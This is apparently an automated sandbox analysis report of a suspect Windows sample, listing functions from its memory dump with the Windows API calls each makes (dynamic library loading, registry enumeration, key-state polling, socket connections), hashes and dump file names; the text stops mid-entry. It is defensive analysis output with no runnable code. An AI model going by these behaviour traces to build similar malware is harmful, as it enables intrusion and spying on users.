Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: MessageSend$ButtonCheckedLongWindow
String ID:
API String ID: 3188977179-0
Opcode ID: 89a057afd116daa9f7ed435255c7a05204d781c17222d19ea6c849e6e19321d3
Instruction ID: 90b6e846cee79c37f68937d1e5d556a0adf06e5f519ccc7968c4268072cf9009
Opcode Fuzzy Hash: 89a057afd116daa9f7ed435255c7a05204d781c17222d19ea6c849e6e19321d3
Instruction Fuzzy Hash: C661A434A00644AFDB24EF54C895FEA77BBEF8A300F144659F9999B3A1C772A950CB10

Function 00661C9A Relevance: 7.7, APIs: 5, Instructions: 158COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00661CB4
VariantClear.OLEAUT32(00000013), ref: 00661D26
VariantClear.OLEAUT32(00000000), ref: 00661D81
VariantClear.OLEAUT32(?), ref: 00661DF8
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00661E26

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType
String ID:
API String ID: 4136290138-0
Opcode ID: 10e225a822e5b1bc51ee9f336b1548282a3e8de687971ef35bdc5da84e2460f1
Instruction ID: e4f30634af7ecc780e20a7818d8586c7765ce10ebd9ff0d6aa7fa64437dd6dca
Opcode Fuzzy Hash: 10e225a822e5b1bc51ee9f336b1548282a3e8de687971ef35bdc5da84e2460f1
Instruction Fuzzy Hash: BA513AB5A00209EFDB14CF58C880AAAB7F9FF8D314B158559E959DB311D730E951CFA0

Function 00680688 Relevance: 7.6, APIs: 5, Instructions: 149libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 0062936C: __swprintf.LIBCMT ref: 006293AB
Part of subcall function 0062936C: __itow.LIBCMT ref: 006293DF

LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 006806EE
GetProcAddress.KERNEL32(00000000,?), ref: 0068077D
GetProcAddress.KERNEL32(00000000,00000000), ref: 0068079B
GetProcAddress.KERNEL32(00000000,?), ref: 006807E1
FreeLibrary.KERNEL32(00000000,00000004), ref: 006807FB

Part of subcall function 0063E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,0066A574,?,?,00000000,00000008), ref: 0063E675
Part of subcall function 0063E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,0066A574,?,?,00000000,00000008), ref: 0063E699

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
String ID:
API String ID: 327935632-0
Opcode ID: fc308059ec266aa19afd9fbbecab05f3afcdba14d9cc7b3fd398b6116e59a650
Instruction ID: 8b46e89eabf0d1205c4f88ddf0af7577ee413e1077aab2e17fc27b20f871e828
Opcode Fuzzy Hash: fc308059ec266aa19afd9fbbecab05f3afcdba14d9cc7b3fd398b6116e59a650
Instruction Fuzzy Hash: 95516775A00615DFDB40EFA8C8819EDB7B6BF49310B048159EA16AB352DB30ED46CF94

Function 00682E29 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00683C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00682BB5,?,?), ref: 00683C1D

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00682EEF
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00682F2E
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00682F75
RegCloseKey.ADVAPI32(?,?), ref: 00682FA1
RegCloseKey.ADVAPI32(00000000), ref: 00682FAE

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper
String ID:
API String ID: 3740051246-0
Opcode ID: 5d909fc4da2516c6c6be7b8fc5bf1fcdf01982f4edccdf57d10ec460e6a49f74
Instruction ID: b94e40f0bb1061d2db25e2d3631780a4167ff027e2264885e6e550800487f8b5
Opcode Fuzzy Hash: 5d909fc4da2516c6c6be7b8fc5bf1fcdf01982f4edccdf57d10ec460e6a49f74
Instruction Fuzzy Hash: EC515871208205AFC744EF64C891EAEB7FABF88314F00891DF696972A1DB30E905CF56

Function 0068CCF7 Relevance: 7.6, APIs: 5, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78a7f161333f0a7bb903b8466b6294e79e261f77c3fe3cbb444fff5899ed2449
Instruction ID: ec377f71f8d1305b4bc712ab4b5dcaaf3a6e86e62fca6f967e46928de84c75f7
Opcode Fuzzy Hash: 78a7f161333f0a7bb903b8466b6294e79e261f77c3fe3cbb444fff5899ed2449
Instruction Fuzzy Hash: 5D41A439900214AFC710FB68CC48FE97F66EF0A320F141365F95AA72D1C670AD41DB60

Function 00671206 Relevance: 7.6, APIs: 5, Instructions: 127COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 006712B4
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 006712DD
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0067131C

Part of subcall function 0062936C: __swprintf.LIBCMT ref: 006293AB
Part of subcall function 0062936C: __itow.LIBCMT ref: 006293DF

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00671341
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00671349

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: ec34c3093845f7b2f95b8eca51c5bb43c294af44eb529a5b6fd5ec6b3fd1e832
Instruction ID: f40e06c71ed0966dbd3990f8a12881a8ddd4fd9bf4a2d0271cd3348a4144948b
Opcode Fuzzy Hash: ec34c3093845f7b2f95b8eca51c5bb43c294af44eb529a5b6fd5ec6b3fd1e832
Instruction Fuzzy Hash: A1410B35A00515DFCB41EF64C981AADBBF6FF49310B148099E90AAB362CB31ED41DF64

Function 0063B63C Relevance: 7.6, APIs: 5, Instructions: 110keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(000000FF), ref: 0063B64F
ScreenToClient.USER32(00000000,000000FF), ref: 0063B66C
GetAsyncKeyState.USER32(00000001), ref: 0063B691
GetAsyncKeyState.USER32(00000002), ref: 0063B69F

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 0ccef1cfba7007f88829d18ad5b7971e06d3e7f2d4ed2d79439772097f99f965
Instruction ID: 966e598d9502c92998e8e5327a63f5ce7a89a924ba70639ffa11a0058e3cf018
Opcode Fuzzy Hash: 0ccef1cfba7007f88829d18ad5b7971e06d3e7f2d4ed2d79439772097f99f965
Instruction Fuzzy Hash: 1C417F35A04119FFCF159F64C845AEDBBB6FB06324F104329F82A96291CB30AD94DFA1

Function 0065B358 Relevance: 7.6, APIs: 5, Instructions: 88sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 0065B369
PostMessageW.USER32(?,00000201,00000001), ref: 0065B413
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 0065B41B
PostMessageW.USER32(?,00000202,00000000), ref: 0065B429
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 0065B431

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 4ba1fa680bba092a869d1950eec03a0997ea3ed7e0869b3b4af646c81e4fee0c
Instruction ID: 425af2e33369c235c9589dd2deecf0f3e7734d8512e00be798b4fd87fd20f7a5
Opcode Fuzzy Hash: 4ba1fa680bba092a869d1950eec03a0997ea3ed7e0869b3b4af646c81e4fee0c
Instruction Fuzzy Hash: 8F31AE71900219EBDF14DF68D94DADE7BB6EB05316F105229F921AA2D1C3B0AD58CF90

Function 0065DBBF Relevance: 7.6, APIs: 5, Instructions: 87windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 0065DBD7
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0065DBF4
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0065DC2C
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0065DC52
_wcsstr.LIBCMT ref: 0065DC5C

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
String ID:
API String ID: 3902887630-0
Opcode ID: 4bc6313b76505bd81623a1f917ad4e2a38db289d8ab38c856a6f4c38a76d60d5
Instruction ID: a5c0d879a9aa2db994326f2410750f9af2ba108a374c0565e58fa72301b31b3c
Opcode Fuzzy Hash: 4bc6313b76505bd81623a1f917ad4e2a38db289d8ab38c856a6f4c38a76d60d5
Instruction Fuzzy Hash: 14210771204100BBEB259F399C49EBF7BAEDF46761F10403DFC0ACA191EAA1DC45D6A4

Function 0065BC77 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0065BC90
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0065BCC2
__itow.LIBCMT ref: 0065BCDA
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0065BD00
__itow.LIBCMT ref: 0065BD11

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: MessageSend$__itow
String ID:
API String ID: 3379773720-0
Opcode ID: 82f3d0f7a01a03c0b76b647727a7bcfd908bcd7d4c247a140ba561461b9ba0a3
Instruction ID: 70a1f0b2add5b2ddfbeac3c2ec17aeee2c5829852176c04999426bd13d517ecf
Opcode Fuzzy Hash: 82f3d0f7a01a03c0b76b647727a7bcfd908bcd7d4c247a140ba561461b9ba0a3
Instruction Fuzzy Hash: 4F210B716006187BDB10AF649C46FDE7B7BEF4A351F002029FD06EB181DB70894987A5

Function 00666318 Relevance: 7.6, APIs: 5, Instructions: 80COMMON

Download Yara Rule

APIs

Part of subcall function 006250E6: _wcsncpy.LIBCMT ref: 006250FA

GetFileAttributesW.KERNEL32(?,?,?,?,006660C3), ref: 00666369
GetLastError.KERNEL32(?,?,?,006660C3), ref: 00666374
CreateDirectoryW.KERNEL32(?,00000000,?,?,?,006660C3), ref: 00666388
_wcsrchr.LIBCMT ref: 006663AA

Part of subcall function 00666318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,006660C3), ref: 006663E0

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
String ID:
API String ID: 3633006590-0
Opcode ID: cd4b316fc5d8166591c67816f8beabf4bea572bacf9430463d6d8501cdb2826a
Instruction ID: 9e9be6b75046bf07412f374ebc39f9a8c53adf56bb11c9937f7a06f803f56b78
Opcode Fuzzy Hash: cd4b316fc5d8166591c67816f8beabf4bea572bacf9430463d6d8501cdb2826a
Instruction Fuzzy Hash: 902108319042159BDB11AB74FC52FEA33AEEF163A0F102069F006E73C0EF60DD818A59

Function 00678B95 Relevance: 7.6, APIs: 5, Instructions: 71networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0067A82C: inet_addr.WSOCK32(00000000), ref: 0067A84E

socket.WSOCK32(00000002,00000001,00000006), ref: 00678BD3
WSAGetLastError.WSOCK32(00000000), ref: 00678BE2
connect.WSOCK32(00000000,?,00000010), ref: 00678BFE

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: ErrorLastconnectinet_addrsocket
String ID:
API String ID: 3701255441-0
Opcode ID: 041a5ec2282e2898c14f509e823a5c1a49f62d7bd495328c82952c5d9bcb4584
Instruction ID: 132ba53bd3e99767168cc03a379e1765583dbb85cca12dce4cb5004e148aa448
Opcode Fuzzy Hash: 041a5ec2282e2898c14f509e823a5c1a49f62d7bd495328c82952c5d9bcb4584
Instruction Fuzzy Hash: 3621AE312002149FCB54AF68C989B7E77AAAF49720F04944DF946AB392CB74EC018B65

Function 00678420 Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00678441
GetForegroundWindow.USER32 ref: 00678458
GetDC.USER32(00000000), ref: 00678494
GetPixel.GDI32(00000000,?,00000003), ref: 006784A0
ReleaseDC.USER32(00000000,00000003), ref: 006784DB

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: e08d20425cbd62bceb847a441d71b4889c4c826041b2782d93d288477335eca6
Instruction ID: be76b59a480575bc7f81b7238a3aa23cb6d3000b8e351cb4b3800a0fad110056
Opcode Fuzzy Hash: e08d20425cbd62bceb847a441d71b4889c4c826041b2782d93d288477335eca6
Instruction Fuzzy Hash: EC219F75A00204AFD740EFA4D888AAEBBE6EF49341F04C47DF84AD7651CA70BD40CB60

Function 0063AF83 Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0063AFE3
SelectObject.GDI32(?,00000000), ref: 0063AFF2
BeginPath.GDI32(?), ref: 0063B009
SelectObject.GDI32(?,00000000), ref: 0063B033

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 08558908f1b57deeb778f9dca338e62dab276f52a789a13cea27d0902b69c676
Instruction ID: 960d9e0672fe34973a4a6436bdac04aae1d9a059342366afc97de0415f128b8e
Opcode Fuzzy Hash: 08558908f1b57deeb778f9dca338e62dab276f52a789a13cea27d0902b69c676
Instruction Fuzzy Hash: C0218370800385EFDB10EF55EC84BDE7B6BBB12355F18631AE5259E2A0C3705A51EF91

Function 0064217F Relevance: 7.6, APIs: 5, Instructions: 61threadCOMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 006421A9
CreateThread.KERNEL32(?,?,006422DF,00000000,?,?), ref: 006421ED
GetLastError.KERNEL32 ref: 006421F7
_free.LIBCMT ref: 00642200
__dosmaperr.LIBCMT ref: 0064220B

Part of subcall function 00647C0E: __getptd_noexit.LIBCMT ref: 00647C0E

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
String ID:
API String ID: 2664167353-0
Opcode ID: 695602467f09176897c427f8ce801dc5bb0f45efabdac933f2d404493780fad2
Instruction ID: 089a87f4c22df7a75540855fa179224a7dcb47b21ce383acc942ce1480a0ef07
Opcode Fuzzy Hash: 695602467f09176897c427f8ce801dc5bb0f45efabdac933f2d404493780fad2
Instruction Fuzzy Hash: 11110432104347AF9B11AFA4DC41DAB7B9BEF02770B20042DFA1487291EBB2D8418AA5

Function 0065ABBB Relevance: 7.5, APIs: 5, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0065ABD7
GetLastError.KERNEL32(?,0065A69F,?,?,?), ref: 0065ABE1
GetProcessHeap.KERNEL32(00000008,?,?,0065A69F,?,?,?), ref: 0065ABF0
HeapAlloc.KERNEL32(00000000,?,0065A69F,?,?,?), ref: 0065ABF7
GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0065AC0E

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: 179601bacc9a57ec6e8b4337d6f036871aca26bf419a4b12ec48a70f1e33ae7d
Instruction ID: 79ef5e81c37a8209f9d8609a1a3e0342c4ccff25d6ac00af01407e3a661e9ea6
Opcode Fuzzy Hash: 179601bacc9a57ec6e8b4337d6f036871aca26bf419a4b12ec48a70f1e33ae7d
Instruction Fuzzy Hash: FE013C71200204BFDB105FA9DC48DAB3BAEEF8A755B101529F946C3260DA71EC44CF61

Function 00667A58 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00667A74
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00667A82
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00667A8A
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00667A94
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00667AD0

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 84a5de91d0f27d6d6278b8aa98be7bb0ebd1bd23aeb97497ccaa8efb213e5d27
Instruction ID: eb73d7cc350fe01ec713a94878e43f6e417f747fa8a5bc05ec6ef9151a0c80ae
Opcode Fuzzy Hash: 84a5de91d0f27d6d6278b8aa98be7bb0ebd1bd23aeb97497ccaa8efb213e5d27
Instruction Fuzzy Hash: A0014C71C04619EBCF00AFE5DC48ADDBB7AFF09715F000495E902B2250DB30AA55CBA5

Function 00659ABF Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32 ref: 00659ADC
ProgIDFromCLSID.OLE32(?,00000000), ref: 00659AF7
lstrcmpiW.KERNEL32(?,00000000), ref: 00659B05
CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00659B15
CLSIDFromString.OLE32(?,?), ref: 00659B21

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
